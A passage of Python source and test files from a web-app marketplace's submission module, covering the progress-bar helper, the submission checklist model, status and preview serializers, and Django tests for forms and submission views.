from mkt.submit.models import AppSubmissionChecklist
def del_by_key(data, delete):
    """Delete a tuple from a list of tuples based on its first item.

    Returns a new list containing every tuple of *data* whose first item
    does not match *delete* (string equality for string keys, membership
    for list/tuple keys).

    BUGFIX: the previous implementation called ``del data[idx]`` while
    iterating ``enumerate(data)``, which skipped the element immediately
    following each deletion (so consecutive matches were not all removed).
    Building a filtered copy avoids mutation during iteration.
    """
    return [item for item in data
            if not ((isinstance(item[0], basestring) and item[0] == delete) or
                    (isinstance(item[0], (list, tuple)) and
                     item[0] in delete))]
@register.function
def progress(request, addon, step):
    """Render the submission-progress bar template for the given step.

    Returns a jinja2.Markup blob; only meaningful for webapps.
    """
    # NOTE(review): returning (not raising) NotImplementedError looks
    # intentional here — the template helper must not blow up — but confirm.
    if addon and not addon.is_webapp():
        return NotImplementedError
    steps = list(mkt.APP_STEPS)
    if waffle.switch_is_active('iarc'):
        # TODO: uncomment next_steps to mkt/constants/submit.
        steps[3] = ('next_steps', _('Next Steps'))
    completed = []
    # TODO: Hide "Developer Account" step if user already read Dev Agreement.
    #if request.amo_user.read_dev_agreement:
    #    steps = del_by_key(steps, 'terms')
    if addon:
        try:
            completed = addon.appsubmissionchecklist.get_completed()
        except AppSubmissionChecklist.DoesNotExist:
            pass
    # We don't yet have a checklist yet if we just read the Dev Agreement.
    if not completed and step and step != 'terms':
        completed = ['terms']
    c = dict(steps=steps, current=step, completed=completed)
    t = env.get_template('submit/helpers/progress.html').render(c)
    return jinja2.Markup(t)
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo.models
import mkt
class AppSubmissionChecklist(amo.models.ModelBase):
    """Per-app record of which submission steps have been completed.

    Each boolean column mirrors a step name from ``mkt.APP_STEPS``.
    """
    addon = models.OneToOneField('addons.Addon')
    terms = models.BooleanField(default=False)
    manifest = models.BooleanField(default=False)
    details = models.BooleanField(default=False)

    class Meta:
        db_table = 'submission_checklist_apps'

    def get_completed(self):
        """Return a list of completed submission steps."""
        return [step for step, label in mkt.APP_STEPS
                if getattr(self, step, False)]

    def get_next(self):
        """Return the next incomplete step, or None when all are done."""
        # The final APP_STEPS entry ("done") has no backing column, so it
        # is deliberately excluded from the scan.
        pending = (step for step, label in mkt.APP_STEPS[:-1]
                   if not getattr(self, step, False))
        return next(pending, None)
########NEW FILE########
__FILENAME__ = serializers
import json
from django.core.urlresolvers import reverse
from rest_framework import serializers
import amo
from addons.models import Preview
from files.models import FileUpload
from mkt.api.fields import ReverseChoiceField
from mkt.webapps.models import Webapp
class AppStatusSerializer(serializers.ModelSerializer):
    """Expose and validate status / disabled_by_user changes on a Webapp.

    Only two developer-initiated transitions are permitted (see
    ``allowed_statuses``): incomplete -> pending review, and
    approved-but-waiting -> public.
    """
    status = ReverseChoiceField(choices_dict=amo.STATUS_CHOICES_API,
                                required=False)
    disabled_by_user = serializers.BooleanField(required=False)

    # Maps a current status to the only status it may be changed to.
    allowed_statuses = {
        # You can push to the pending queue.
        amo.STATUS_NULL: amo.STATUS_PENDING,
        # You can push to public if you've been reviewed.
        amo.STATUS_PUBLIC_WAITING: amo.STATUS_PUBLIC,
    }

    class Meta:
        model = Webapp
        fields = ('status', 'disabled_by_user')

    def validate_status(self, attrs, source):
        """Reject status changes that are not in ``allowed_statuses`` or
        that target an incomplete app.

        Raises serializers.ValidationError on any rejected change.
        """
        if not self.object:
            raise serializers.ValidationError(u'Error getting app.')

        # Nothing to validate when no new status was submitted.
        # (Idiom fix: was `if not source in attrs`.)
        if source not in attrs:
            return attrs

        # An incomplete app's status can not be changed.
        if not self.object.is_fully_complete():
            raise serializers.ValidationError(
                self.object.completion_error_msgs())

        # Only some specific changes are possible depending on the app current
        # status.
        if (self.object.status not in self.allowed_statuses or
                attrs[source] != self.allowed_statuses[self.object.status]):
            raise serializers.ValidationError(
                'App status can not be changed to the one you specified.')

        return attrs
class FileUploadSerializer(serializers.ModelSerializer):
    """Read-only representation of a FileUpload (validation results)."""
    id = serializers.CharField(source='pk', read_only=True)
    processed = serializers.BooleanField(read_only=True)

    class Meta:
        model = FileUpload
        fields = ('id', 'processed', 'valid', 'validation')

    def transform_validation(self, obj, value):
        # The validation blob is stored as a JSON string; decode it for
        # API consumers. Empty/None values pass through unchanged.
        if not value:
            return value
        return json.loads(value)
class PreviewSerializer(serializers.ModelSerializer):
    """Full representation of a Preview image, including its API URI."""
    filetype = serializers.CharField()
    id = serializers.IntegerField(source='pk')
    image_url = serializers.CharField(read_only=True)
    resource_uri = serializers.SerializerMethodField('get_resource_uri')
    thumbnail_url = serializers.CharField(read_only=True)

    class Meta:
        model = Preview
        fields = ['filetype', 'image_url', 'id', 'resource_uri',
                  'thumbnail_url']

    def get_resource_uri(self, request):
        # No bound object (e.g. during deserialization) -> no URI.
        obj = self.object
        return (None if obj is None else
                reverse('app-preview-detail', kwargs={'pk': obj.pk}))
class SimplePreviewSerializer(PreviewSerializer):
    """Slimmed-down Preview serializer: just the two image URLs."""
    class Meta(PreviewSerializer.Meta):
        fields = ['image_url', 'thumbnail_url']
########NEW FILE########
__FILENAME__ = test_forms
from django.forms.fields import BooleanField
from django.utils.translation import ugettext_lazy as _
import mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from devhub.models import AppLog
from editors.models import RereviewQueue
from files.models import FileUpload
from users.models import UserProfile
from mkt.constants.features import APP_FEATURES
from mkt.site.fixtures import fixture
from mkt.submit import forms
from mkt.webapps.models import AppFeatures, Webapp
class TestNewWebappForm(amo.tests.TestCase):
    """Validation tests for the initial app-submission form: platform
    selection, free vs. paid, and hosted vs. packaged."""

    def setUp(self):
        self.request = RequestFactory().get('/')
        self.file = FileUpload.objects.create(valid=True)

    def test_not_free_or_paid(self):
        # No platform chosen at all -> both platform fields error.
        form = forms.NewWebappForm({})
        assert not form.is_valid()
        eq_(form.ERRORS['none'], form.errors['free_platforms'])
        eq_(form.ERRORS['none'], form.errors['paid_platforms'])

    def test_not_paid(self):
        # Paid platforms without the paid-submission flag are rejected.
        form = forms.NewWebappForm({'paid_platforms': ['paid-firefoxos']})
        assert not form.is_valid()
        eq_(form.ERRORS['none'], form.errors['free_platforms'])
        eq_(form.ERRORS['none'], form.errors['paid_platforms'])

    def test_paid(self):
        self.create_flag('allow-b2g-paid-submission')
        form = forms.NewWebappForm({'paid_platforms': ['paid-firefoxos'],
                                    'upload': self.file.uuid},
                                   request=self.request)
        assert form.is_valid()
        eq_(form.get_paid(), amo.ADDON_PREMIUM)

    def test_free(self):
        self.create_flag('allow-b2g-paid-submission')
        form = forms.NewWebappForm({'free_platforms': ['free-firefoxos'],
                                    'upload': self.file.uuid})
        assert form.is_valid()
        eq_(form.get_paid(), amo.ADDON_FREE)

    def test_platform(self):
        # Each platform choice maps to the expected device-type constants.
        self.create_flag('allow-b2g-paid-submission')
        mappings = (
            ({'free_platforms': ['free-firefoxos']}, [amo.DEVICE_GAIA]),
            ({'paid_platforms': ['paid-firefoxos']}, [amo.DEVICE_GAIA]),
            ({'free_platforms': ['free-firefoxos',
                                 'free-android-mobile']},
             [amo.DEVICE_GAIA, amo.DEVICE_MOBILE]),
            ({'free_platforms': ['free-android-mobile',
                                 'free-android-tablet']},
             [amo.DEVICE_MOBILE, amo.DEVICE_TABLET]),
        )
        for data, res in mappings:
            data['upload'] = self.file.uuid
            form = forms.NewWebappForm(data)
            assert form.is_valid(), form.errors
            self.assertSetEqual(res, form.get_devices())

    def test_both(self):
        # Selecting free AND paid platforms together is invalid.
        self.create_flag('allow-b2g-paid-submission')
        form = forms.NewWebappForm({'paid_platforms': ['paid-firefoxos'],
                                    'free_platforms': ['free-firefoxos']},
                                   request=self.request)
        assert not form.is_valid()
        eq_(form.ERRORS['both'], form.errors['free_platforms'])
        eq_(form.ERRORS['both'], form.errors['paid_platforms'])

    def test_multiple(self):
        form = forms.NewWebappForm({'free_platforms': ['free-firefoxos',
                                                       'free-desktop'],
                                    'upload': self.file.uuid})
        assert form.is_valid()

    def test_not_packaged(self):
        form = forms.NewWebappForm({'free_platforms': ['free-firefoxos'],
                                    'upload': self.file.uuid})
        assert form.is_valid(), form.errors
        assert not form.is_packaged()

    def test_not_packaged_allowed(self):
        form = forms.NewWebappForm({'free_platforms': ['free-firefoxos'],
                                    'upload': self.file.uuid})
        assert form.is_valid(), form.errors
        assert not form.is_packaged()

    @mock.patch('mkt.submit.forms.parse_addon',
                lambda *args: {'version': None})
    def test_packaged_disallowed_behind_flag(self):
        # Packaged apps on non-Firefox-OS platforms need waffle flags.
        for device in ('free-desktop',
                       'free-android-mobile',
                       'free-android-tablet'):
            form = forms.NewWebappForm({'free_platforms': [device],
                                        'upload': self.file.uuid,
                                        'packaged': True})
            assert not form.is_valid(), form.errors
            eq_(form.ERRORS['packaged'], form.errors['paid_platforms'])

    @mock.patch('mkt.submit.forms.parse_addon',
                lambda *args: {'version': None})
    def test_packaged_allowed_everywhere(self):
        # With both flags on, packaged submission works on every platform.
        self.create_flag('android-packaged')
        self.create_flag('desktop-packaged')
        for device in ('free-firefoxos',
                       'free-desktop',
                       'free-android-tablet',
                       'free-android-mobile'):
            form = forms.NewWebappForm({'free_platforms': [device],
                                        'upload': self.file.uuid,
                                        'packaged': True},
                                       request=self.request)
            assert form.is_valid(), form.errors
            assert form.is_packaged()
class TestNewWebappVersionForm(amo.tests.TestCase):
    """Tests for the new-version form, mainly app-origin uniqueness
    enforcement for packaged apps."""

    def setUp(self):
        self.request = RequestFactory().get('/')
        self.file = FileUpload.objects.create(valid=True)

    def test_no_upload(self):
        form = forms.NewWebappVersionForm(request=self.request,
                                          is_packaged=True)
        assert not form.is_valid(), form.errors

    @mock.patch('mkt.submit.forms.parse_addon',
                lambda *args: {"origin": "app://hy.fr"})
    @mock.patch('mkt.submit.forms.verify_app_domain')
    def test_verify_app_domain_called(self, _verify):
        # With the uniqueness switch on, domain verification must run.
        self.create_switch('webapps-unique-by-domain')
        form = forms.NewWebappVersionForm({'upload': self.file.uuid},
                                          request=self.request,
                                          is_packaged=True)
        assert form.is_valid(), form.errors
        assert _verify.called

    @mock.patch('mkt.submit.forms.parse_addon',
                lambda *args: {"origin": "app://hy.fr"})
    def test_verify_app_domain_exclude_same(self):
        # An app may keep its own origin: no duplicate error.
        app = amo.tests.app_factory(app_domain='app://hy.fr')
        form = forms.NewWebappVersionForm(
            {'upload': self.file.uuid}, request=self.request, is_packaged=True,
            addon=app)
        assert form.is_valid(), form.errors

    @mock.patch('mkt.submit.forms.parse_addon',
                lambda *args: {"origin": "app://hy.fr"})
    def test_verify_app_domain_exclude_different(self):
        # Another app already owns the origin -> validation error.
        app = amo.tests.app_factory(app_domain='app://yo.lo')
        amo.tests.app_factory(app_domain='app://hy.fr')
        form = forms.NewWebappVersionForm(
            {'upload': self.file.uuid}, request=self.request, is_packaged=True,
            addon=app)
        assert not form.is_valid(), form.errors
        assert 'An app already exists' in ''.join(form.errors['upload'])
class TestAppDetailsBasicForm(amo.tests.TestCase):
    """Tests for the details form used in the submission flow."""
    fixtures = fixture('user_999', 'webapp_337141')

    def setUp(self):
        self.request = mock.Mock()
        self.request.amo_user = UserProfile.objects.get(id=999)

    def test_slug(self):
        # Mixed-case slugs are accepted but stored lowercased.
        app = Webapp.objects.get(pk=337141)
        data = {
            'app_slug': 'thisIsAslug',
            'description': '.',
            'privacy_policy': '.',
            'support_email': '[email protected]',
        }
        form = forms.AppDetailsBasicForm(data, request=self.request,
                                         instance=app)
        assert form.is_valid()
        form.save()
        eq_(app.app_slug, 'thisisaslug')
class TestAppFeaturesForm(amo.tests.TestCase):
    """Tests for AppFeaturesForm: field generation, API-field ordering,
    and the re-review side effects of feature changes."""
    fixtures = fixture('user_999', 'webapp_337141')

    def setUp(self):
        amo.set_user(UserProfile.objects.all()[0])
        self.form = forms.AppFeaturesForm()
        self.app = Webapp.objects.get(pk=337141)
        self.features = self.app.current_version.features

    def _check_log(self, action):
        # Helper: assert that the given activity-log action was recorded.
        assert AppLog.objects.filter(
            addon=self.app, activity_log__action=action.id).exists(), (
                "Didn't find `%s` action in logs." % action.short)

    def test_required(self):
        # Every combination of all-True / all-False is valid input.
        f_names = self.form.fields.keys()
        for value in (True, False):
            form = forms.AppFeaturesForm(dict((n, value) for n in f_names))
            eq_(form.is_valid(), True, form.errors)

    def test_correct_fields(self):
        # The form exposes exactly the AppFeatures boolean columns,
        # minus the excluded 'version' FK.
        fields = self.form.fields
        f_values = fields.values()
        assert 'version' not in fields
        assert all(isinstance(f, BooleanField) for f in f_values)
        self.assertSetEqual(fields, AppFeatures()._fields())

    def test_required_api_fields(self):
        fields = [f.help_text for f in self.form.required_api_fields()]
        eq_(fields, sorted(f['name'] for f in APP_FEATURES.values()))

    def test_required_api_fields_nonascii(self):
        # Sorting must not choke on non-ASCII help text.
        forms.AppFeaturesForm.base_fields['has_apps'].help_text = _(
            u'H\xe9llo')
        fields = [f.help_text for f in self.form.required_api_fields()]
        eq_(fields, sorted(f['name'] for f in APP_FEATURES.values()))

    def test_changes_mark_for_rereview(self):
        # Changing the feature set of an approved app queues a re-review
        # and logs the change.
        self.features.update(has_sms=True)
        data = {'has_apps': True}
        self.form = forms.AppFeaturesForm(instance=self.features, data=data)
        self.form.save()
        ok_(self.features.has_apps)
        ok_(not self.features.has_sms)
        ok_(not self.features.has_contacts)
        action_id = amo.LOG.REREVIEW_FEATURES_CHANGED.id
        assert AppLog.objects.filter(addon=self.app,
                                     activity_log__action=action_id).exists()
        eq_(RereviewQueue.objects.count(), 1)

    def test_no_changes_not_marked_for_rereview(self):
        # Re-saving an identical feature set must NOT trigger re-review.
        self.features.update(has_sms=True)
        data = {'has_sms': True}
        self.form = forms.AppFeaturesForm(instance=self.features, data=data)
        self.form.save()
        ok_(not self.features.has_apps)
        ok_(self.features.has_sms)
        eq_(RereviewQueue.objects.count(), 0)
        action_id = amo.LOG.REREVIEW_FEATURES_CHANGED.id
        assert not AppLog.objects.filter(
            addon=self.app,
            activity_log__action=action_id).exists()

    def test_changes_mark_for_rereview_bypass(self):
        # mark_for_rereview=False suppresses both queueing and logging.
        self.features.update(has_sms=True)
        data = {'has_apps': True}
        self.form = forms.AppFeaturesForm(instance=self.features, data=data)
        self.form.save(mark_for_rereview=False)
        ok_(self.features.has_apps)
        ok_(not self.features.has_sms)
        eq_(RereviewQueue.objects.count(), 0)
        action_id = amo.LOG.REREVIEW_FEATURES_CHANGED.id
        assert not AppLog.objects.filter(
            addon=self.app,
            activity_log__action=action_id).exists()
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import eq_
import amo
import amo.tests
from mkt.submit.models import AppSubmissionChecklist
from mkt.webapps.models import Webapp
from mkt.site.fixtures import fixture
class TestAppSubmissionChecklist(amo.tests.TestCase):
    """Tests for the step-completion bookkeeping on the checklist model."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.webapp = Webapp.objects.get(id=337141)
        self.cl = AppSubmissionChecklist.objects.create(addon=self.webapp)

    def test_default(self):
        # A fresh checklist has no completed steps.
        eq_(self.cl.get_completed(), [])

    def test_terms(self):
        self.cl.update(terms=True)
        eq_(self.cl.get_completed(), ['terms'])

    def test_manifest(self):
        self.cl.update(terms=True, manifest=True)
        eq_(self.cl.get_completed(), ['terms', 'manifest'])

    def test_details(self):
        self.cl.update(terms=True, manifest=True, details=True)
        eq_(self.cl.get_completed(), ['terms', 'manifest', 'details'])

    def test_next_details(self):
        self.cl.update(terms=True, manifest=True)
        eq_(self.cl.get_next(), 'details')
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import datetime
import json
import os
import shutil
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
import amo
import amo.tests
import mkt
from addons.models import (Addon, AddonCategory, AddonDeviceType, AddonUser,
Category)
from amo.tests import formset, initial
from amo.tests.test_helpers import get_image_path
from apps.users.models import UserNotification
from apps.users.notifications import app_surveys
from constants.applications import DEVICE_TYPES
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
from mkt.submit.decorators import read_dev_agreement_required
from mkt.submit.forms import AppFeaturesForm, NewWebappVersionForm
from mkt.submit.models import AppSubmissionChecklist
from mkt.webapps.models import AppFeatures, Webapp
from translations.models import Translation
from users.models import UserProfile
class TestSubmit(amo.tests.TestCase):
    """Base class for submission-flow view tests: logs in a regular user
    and provides progress-bar assertion helpers."""
    fixtures = fixture('user_999')

    def setUp(self):
        # fetch_icon would hit the network; patch it for the whole test.
        self.fi_mock = mock.patch(
            'mkt.developers.tasks.fetch_icon').__enter__()
        self.user = self.get_user()
        assert self.client.login(username=self.user.email, password='password')

    def tearDown(self):
        self.fi_mock.__exit__()

    def get_user(self):
        return UserProfile.objects.get(username='regularuser')

    def get_url(self, url):
        """Reverse a submit.app.* URL for the current webapp."""
        return reverse('submit.app.%s' % url, args=[self.webapp.app_slug])

    def _test_anonymous(self):
        self.client.logout()
        r = self.client.get(self.url, follow=True)
        self.assertLoginRedirects(r, self.url)

    def _test_progress_display(self, completed, current):
        """Test that the correct steps are highlighted."""
        r = self.client.get(self.url)
        progress = pq(r.content)('#submission-progress')

        # Check the completed steps.
        completed_found = progress.find('.completed')
        for idx, step in enumerate(completed):
            li = completed_found.eq(idx)
            eq_(li.text(), unicode(mkt.APP_STEPS_TITLE[step]))

        # Check that we link back to the Developer Agreement.
        terms_link = progress.find('.terms a')
        if 'terms' in completed:
            eq_(terms_link.attr('href'),
                reverse('mkt.developers.docs', args=['policies', 'agreement']))
        else:
            eq_(terms_link.length, 0)

        # Check the current step.
        eq_(progress.find('.current').text(),
            unicode(mkt.APP_STEPS_TITLE[current]))
class TestProceed(TestSubmit):
    """Tests for the submission entry point when the user has not yet
    accepted the Developer Agreement."""

    def setUp(self):
        super(TestProceed, self).setUp()
        self.user.update(read_dev_agreement=None)
        self.url = reverse('submit.app')

    def test_is_authenticated(self):
        # Redirect user to Terms.
        r = self.client.get(self.url)
        self.assert3xx(r, reverse('submit.app.terms'))

    def test_is_anonymous(self):
        # Show user to Terms page but with the login prompt.
        self.client.logout()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        eq_(r.context['proceed'], True)
class TestTerms(TestSubmit):
    """Tests for the Developer Agreement ("terms") submission step,
    including the optional newsletter signup."""

    def setUp(self):
        super(TestTerms, self).setUp()
        self.user.update(read_dev_agreement=None)
        self.url = reverse('submit.app.terms')

    def test_anonymous(self):
        self.client.logout()
        r = self.client.get(self.url, follow=True)
        self.assertLoginRedirects(r, self.url)

    def test_jump_to_step(self):
        # The flow entry point forwards straight to the terms step.
        r = self.client.get(reverse('submit.app'), follow=True)
        self.assert3xx(r, self.url)

    def test_page(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)('#submit-terms')
        eq_(doc.length, 1)
        eq_(doc.find('input[name=newsletter]').siblings('label').length, 1,
            'Missing its <label>!')

    def test_progress_display(self):
        self._test_progress_display([], 'terms')

    @mock.patch('basket.subscribe')
    def test_agree(self, subscribe_mock):
        # Agreeing without the newsletter box: no signup, no basket call.
        self.client.post(self.url, {'read_dev_agreement': True})
        dt = self.get_user().read_dev_agreement
        self.assertCloseToNow(dt)
        eq_(UserNotification.objects.count(), 0)
        assert not subscribe_mock.called

    @mock.patch('basket.subscribe')
    def test_agree_and_sign_me_up(self, subscribe_mock):
        # Agreeing with the newsletter box ticked subscribes the user.
        self.client.post(self.url, {'read_dev_agreement':
                                    datetime.datetime.now(),
                                    'newsletter': True})
        dt = self.get_user().read_dev_agreement
        self.assertCloseToNow(dt)
        eq_(UserNotification.objects.count(), 1)
        notes = UserNotification.objects.filter(user=self.user, enabled=True,
                                                notification_id=app_surveys.id)
        # BUGFIX: the failure message used to read "Expected to not be
        # subscribed", contradicting the assertion (count == 1 means the
        # user IS subscribed).
        eq_(notes.count(), 1, 'Expected to be subscribed to newsletter')
        subscribe_mock.assert_called_with(
            self.user.email, 'app-dev', lang='en-US',
            country='restofworld', format='H',
            source_url='http://testserver/developers/submit')

    def test_disagree(self):
        # Posting without agreeing re-renders the page and changes nothing.
        r = self.client.post(self.url)
        eq_(r.status_code, 200)
        eq_(self.user.read_dev_agreement, None)
        eq_(UserNotification.objects.count(), 0)

    def test_read_dev_agreement_required(self):
        # The decorator redirects users who haven't read the agreement.
        f = mock.Mock()
        f.__name__ = 'function'
        request = mock.Mock()
        request.amo_user.read_dev_agreement = None
        request.get_full_path.return_value = self.url
        func = read_dev_agreement_required(f)
        res = func(request)
        assert not f.called
        eq_(res.status_code, 302)
        eq_(res['Location'], reverse('submit.app'))
class TestManifest(TestSubmit):
    """Tests for the manifest-upload step and its legacy URL redirects."""

    def setUp(self):
        super(TestManifest, self).setUp()
        self.user.update(read_dev_agreement=None)
        self.url = reverse('submit.app')

    def _step(self):
        # Simulate having completed the "terms" step.
        self.user.update(read_dev_agreement=datetime.datetime.now())

    def test_anonymous(self):
        r = self.client.get(self.url, follow=True)
        eq_(r.context['step'], 'terms')

    def test_cannot_skip_prior_step(self):
        r = self.client.get(self.url, follow=True)
        # And we start back at one...
        self.assert3xx(r, reverse('submit.app.terms'))

    def test_jump_to_step(self):
        # I already read the Terms.
        self._step()
        # So jump me to the Manifest step.
        r = self.client.get(reverse('submit.app'), follow=True)
        eq_(r.context['step'], 'manifest')

    def test_legacy_redirects(self):
        # Old submission URLs must redirect to the current flow.
        def check():
            for before, status in redirects:
                r = self.client.get(before, follow=True)
                self.assert3xx(r, dest, status)
        # I haven't read the dev agreement.
        redirects = (
            ('/developers/submit/', 302),
            ('/developers/submit/app', 302),
            ('/developers/submit/app/terms', 302),
            ('/developers/submit/app/manifest', 302),
        )
        dest = '/developers/submit/terms'
        check()
        # I have read the dev agreement.
        self._step()
        redirects = (
            ('/developers/submit/app', 302),
            ('/developers/submit/app/terms', 302),
            ('/developers/submit/app/manifest', 302),
            ('/developers/submit/manifest', 301),
        )
        dest = '/developers/submit/'
        check()

    def test_page(self):
        self._step()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('#upload-file').length, 1)

    def test_progress_display(self):
        self._step()
        self._test_progress_display(['terms'], 'manifest')
class UploadAddon(object):
    """Mixin providing a helper to POST ``self.upload`` to ``self.url``."""

    def post(self, expect_errors=False, data=None):
        """POST the upload; assert a 200 and (optionally) no form errors."""
        payload = {'free_platforms': ['free-desktop']} if data is None else data
        payload.update(upload=self.upload.pk)
        response = self.client.post(self.url, payload, follow=True)
        eq_(response.status_code, 200)
        if not expect_errors:
            # Show any unexpected form errors.
            context = response.context
            if context and 'form' in context:
                eq_(context['form'].errors, {})
        return response
class BaseWebAppTest(BaseUploadTest, UploadAddon, amo.tests.TestCase):
    """Base class for hosted-app submission tests: sets up a validated
    manifest upload and a logged-in developer."""
    fixtures = fixture('app_firefox', 'platform_all', 'user_999', 'user_10482')

    def setUp(self):
        super(BaseWebAppTest, self).setUp()
        self.manifest = self.manifest_path('mozball.webapp')
        self.manifest_url = 'http://allizom.org/mozball.webapp'
        self.upload = self.get_upload(abspath=self.manifest)
        self.upload.update(name=self.manifest_url, is_webapp=True)
        self.url = reverse('submit.app')
        assert self.client.login(username='[email protected]',
                                 password='password')

    def post_addon(self, data=None):
        """POST the upload and return the single Addon it created."""
        eq_(Addon.objects.count(), 0)
        self.post(data=data)
        return Addon.objects.get()
class TestCreateWebApp(BaseWebAppTest):
    """End-to-end tests for creating a hosted app from an uploaded
    manifest: redirects, duplicate-domain hints, metadata extraction,
    locales, platforms, and feature creation."""

    @mock.patch('mkt.developers.tasks.fetch_icon')
    def test_post_app_redirect(self, fi_mock):
        r = self.post()
        webapp = Webapp.objects.get()
        self.assert3xx(r,
                       reverse('submit.app.details', args=[webapp.app_slug]))
        assert fi_mock.delay.called, (
            'The fetch_icon task was expected to be called')

    def test_no_hint(self):
        # Without the uniqueness switch, resubmitting the same manifest
        # gives neither a duplicate hint nor a validation error.
        self.post_addon()
        self.upload = self.get_upload(abspath=self.manifest)
        r = self.client.post(reverse('mkt.developers.upload_manifest'),
                             dict(manifest=self.manifest_url), follow=True)
        eq_(r.status_code, 200)
        assert 'already submitted' not in r.content, (
            'Unexpected helpful error (trap_duplicate)')
        assert 'already exists' not in r.content, (
            'Unexpected validation error (verify_app_domain)')

    def test_no_upload(self):
        data = {'free_platforms': ['free-desktop']}
        res = self.client.post(self.url, data, follow=True)
        eq_(res.context['form'].errors,
            {'upload': NewWebappVersionForm.upload_error})

    @mock.patch('mkt.developers.tasks.fetch_icon')
    def test_bad_upload(self, fi_mock):
        # A bogus upload id fails validation and never fetches an icon.
        data = {'free_platforms': ['free-desktop'], 'upload': 'foo'}
        res = self.client.post(self.url, data, follow=True)
        eq_(res.context['form'].errors,
            {'upload': NewWebappVersionForm.upload_error})
        assert not fi_mock.delay.called, (
            'The fetch_icon task was not expected to be called')

    def test_hint_for_same_manifest(self):
        self.create_switch(name='webapps-unique-by-domain')
        self.post_addon()
        self.upload = self.get_upload(abspath=self.manifest)
        r = self.client.post(reverse('mkt.developers.upload_manifest'),
                             dict(manifest=self.manifest_url))
        data = json.loads(r.content)
        assert 'Oops' in data['validation']['messages'][0]['message'], (
            'Expected oops')

    def test_no_hint_for_same_manifest_different_author(self):
        self.create_switch(name='webapps-unique-by-domain')
        self.post_addon()
        # Submit same manifest as different user.
        assert self.client.login(username='[email protected]',
                                 password='password')
        self.upload = self.get_upload(abspath=self.manifest)
        r = self.client.post(reverse('mkt.developers.upload_manifest'),
                             dict(manifest=self.manifest_url))
        data = json.loads(r.content)
        eq_(data['validation']['messages'][0]['message'],
            'An app already exists on this domain; only one app per domain is '
            'allowed.')

    def test_app_from_uploaded_manifest(self):
        # All of the manifest metadata should land on the new Addon.
        addon = self.post_addon()
        eq_(addon.type, amo.ADDON_WEBAPP)
        eq_(addon.is_packaged, False)
        assert addon.guid is not None, (
            'Expected app to have a UUID assigned to guid')
        eq_(unicode(addon.name), u'MozillaBall ょ')
        eq_(addon.slug, 'app-%s' % addon.id)
        eq_(addon.app_slug, u'mozillaball-ょ')
        eq_(addon.description, u'Exciting Open Web development action!')
        eq_(addon.manifest_url, u'http://allizom.org/mozball.webapp')
        eq_(addon.app_domain, u'http://allizom.org')
        eq_(Translation.objects.get(id=addon.description.id, locale='it'),
            u'Azione aperta emozionante di sviluppo di fotoricettore!')
        eq_(addon.current_version.developer_name, 'Mozilla Labs')
        eq_(addon.current_version.manifest,
            json.loads(open(self.manifest).read()))

    def test_manifest_with_any_extension(self):
        # Manifest detection must not depend on the file extension.
        self.manifest = os.path.join(settings.ROOT, 'mkt', 'developers',
                                     'tests', 'addons', 'mozball.owa')
        self.upload = self.get_upload(abspath=self.manifest, is_webapp=True)
        addon = self.post_addon()
        eq_(addon.type, amo.ADDON_WEBAPP)

    def test_version_from_uploaded_manifest(self):
        addon = self.post_addon()
        eq_(addon.current_version.version, '1.0')

    def test_file_from_uploaded_manifest(self):
        addon = self.post_addon()
        files = addon.current_version.files.all()
        eq_(len(files), 1)
        eq_(files[0].status, amo.STATUS_PENDING)

    def test_set_platform(self):
        app = self.post_addon(
            {'free_platforms': ['free-android-tablet', 'free-desktop']})
        self.assertSetEqual(app.device_types,
                            [amo.DEVICE_TABLET, amo.DEVICE_DESKTOP])

    def test_free(self):
        app = self.post_addon({'free_platforms': ['free-firefoxos']})
        self.assertSetEqual(app.device_types, [amo.DEVICE_GAIA])
        eq_(app.premium_type, amo.ADDON_FREE)

    def test_premium(self):
        self.create_flag('allow-b2g-paid-submission')
        app = self.post_addon({'paid_platforms': ['paid-firefoxos']})
        self.assertSetEqual(app.device_types, [amo.DEVICE_GAIA])
        eq_(app.premium_type, amo.ADDON_PREMIUM)

    def test_supported_locales(self):
        addon = self.post_addon()
        eq_(addon.default_locale, 'en-US')
        eq_(addon.versions.latest().supported_locales, 'es,it')

    def test_short_locale(self):
        # This manifest has a locale code of "pt" which is in the
        # SHORTER_LANGUAGES setting and should get converted to "pt-PT".
        self.manifest = self.manifest_path('short-locale.webapp')
        self.upload = self.get_upload(abspath=self.manifest)
        addon = self.post_addon()
        eq_(addon.default_locale, 'pt-PT')
        eq_(addon.versions.latest().supported_locales, 'es')

    def test_unsupported_detail_locale(self):
        # This manifest has a locale code of "en-GB" which is unsupported, so
        # we default to "en-US".
        self.manifest = self.manifest_path('unsupported-default-locale.webapp')
        self.upload = self.get_upload(abspath=self.manifest)
        addon = self.post_addon()
        eq_(addon.default_locale, 'en-US')
        eq_(addon.versions.latest().supported_locales, 'es,it')

    def test_appfeatures_creation(self):
        # Checked feature boxes map 1:1 onto AppFeatures booleans.
        addon = self.post_addon(data={
            'free_platforms': ['free-desktop'],
            'has_contacts': 'on'
        })
        features = addon.current_version.features
        ok_(isinstance(features, AppFeatures))
        field_names = [f.name for f in AppFeaturesForm().all_fields()]
        for field in field_names:
            expected = field == 'has_contacts'
            eq_(getattr(features, field), expected)
class TestCreateWebAppFromManifest(BaseWebAppTest):
    """Duplicate-domain handling when submitting by manifest URL, with and
    without the 'webapps-unique-by-domain' switch."""

    def setUp(self):
        super(TestCreateWebAppFromManifest, self).setUp()
        # Pre-existing app occupying the domain we will collide with.
        Webapp.objects.create(app_slug='xxx',
                              app_domain='http://existing-app.com')

    def upload_webapp(self, manifest_url, **post_kw):
        self.upload.update(name=manifest_url)  # Simulate JS upload.
        return self.post(**post_kw)

    def post_manifest(self, manifest_url):
        rs = self.client.post(reverse('mkt.developers.upload_manifest'),
                              dict(manifest=manifest_url))
        if 'json' in rs['content-type']:
            rs = json.loads(rs.content)
        return rs

    def test_duplicate_domain(self):
        self.create_switch(name='webapps-unique-by-domain')
